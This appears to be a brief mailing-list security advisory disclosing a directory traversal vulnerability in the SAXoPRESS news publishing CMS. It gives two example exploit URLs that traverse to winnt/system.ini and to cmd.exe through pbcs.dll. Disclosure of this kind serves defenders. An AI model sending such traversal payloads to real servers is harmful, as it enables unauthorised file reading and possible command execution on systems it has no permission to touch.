SAXoPRESS - directory traversal

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



SAXoPRESS is a content management system, mainly used for news publishing.

A vulnerability exists in SAXoPRESS, which allows malicious users to read the contents of files on the server, and possibly execute arbitrary commands.

Example exploit:
http://example.com/apps/pbcs.dll/misc?url=../../../../../../../../../../winnt/system.ini
http://example.com/apps/pbcs.dll/misc?url=../../../../../../../../../../winnt/system32/cmd.exe

Affected versions: unconfirmed

[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux